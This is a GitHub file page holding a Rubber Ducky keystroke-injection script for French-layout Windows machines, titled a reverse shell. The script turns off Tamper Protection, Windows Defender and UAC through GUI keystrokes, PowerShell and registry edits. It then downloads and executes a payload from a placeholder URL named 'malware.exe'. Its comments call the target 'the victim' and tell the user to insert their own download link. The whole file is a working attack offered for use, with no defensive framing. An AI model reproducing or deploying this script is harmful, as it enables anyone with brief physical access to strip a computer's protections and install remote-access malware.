forked from FreeLesio/Rubber-Ducky-Reverse-Shell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathLESiO's Ducky - French Reverse Shell.txt
64 lines (64 loc) · 2.87 KB
/
LESiO's Ducky - French Reverse Shell.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
REM _____
REM _____ _____\ \ _____ ____________ ____
REM |\ \ / / | | _____\ \ / \ ____\_ \__
REM \\ \ / / /___/| / / \ | |\___/\ \\___/| / / \
REM \\ \ | |__ |___|/ | | /___/| \|____\ \___|/ / /\ |
REM \| | ______ | \ ____\ \ | || | | | | | |
REM | |/ \ | __/ __ / /\ \|___|/ __ / / __ | | | |
REM / | |\ \ / \ | |/ \ \ / \/ /_/ | | | / /|
REM /_____/\_____/| | \____\/ | |\____\ /____/| |____________/| |\ \_____/ |
REM | | | || | | |____/| | | || | | | | / | \_____\ | /
REM |______|/|____|/ \|____| | | \|___||____|/ |___________|/ \ | |___|/
REM |___|/ \|____|
REM --------------- .: Lesio's Rubber Ducky [Update 04/06/2021] :.
REM --------------- 1 - Disable Permanently Tamper Protection, UAC & Windows Defender
REM --------------- 2 - Download, Execute Reverse Shell
REM --------------- 3 - Fast & Silent Script
DELAY 4000
GUI r
DELAY 200
REM --------------- Permanently Disable Tamper Protection
STRING WindowsDefender://Threat/
ENTER
DELAY 800
TAB
TAB
TAB
TAB
ENTER
DELAY 400
TAB
TAB
TAB
TAB
SPACE
DELAY 800
REM --------------- Doesn't Work ? Use "ALT y" Instead
ALT o
DELAY 400
GUI r
DELAY 200
REM --------------- Self Elevating PowerShell Script
STRING PowerShell Start PowerShell -Verb RunAs
ENTER
DELAY 800
REM --------------- Doesn't Work ? Use "ALT y" Instead
ALT o
DELAY 400
STRING Mode Con: Cols=18 Lines=1
ENTER
STRING TaskKill /F /IM SecHealthUI.EXE
ENTER
REM --------------- Permanently Disable Windows Defender Through Registry
STRING Set-MpPreference -DisableRealTimeMonitoring $True ; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
ENTER
REM --------------- Disable Permanently UAC
REM --------------- UAC Can Only Be Disabled Through The GUI. The Victim Need To Restart His Device To Disable Permanently UAC
STRING Reg.Exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /V EnableLUA /T REG_DWORD /D 0 /F
ENTER
REM --------------- Download, Execute Reverse Shell
REM --------------- Replace $URL By Your Download Link & $File By The Name Of Your Reverse Shell
STRING $Down = New-Object System.Net.WebClient; $Url = 'https://www.example.com/malware.exe'; $File = 'Hidden Malware.exe'; $Down.DownloadFile($Url,$File); $Exec = New-Object -Com Shell.Application; $Exec.ShellExecute($File); Exit;
ENTER
DELAY 800
ENTER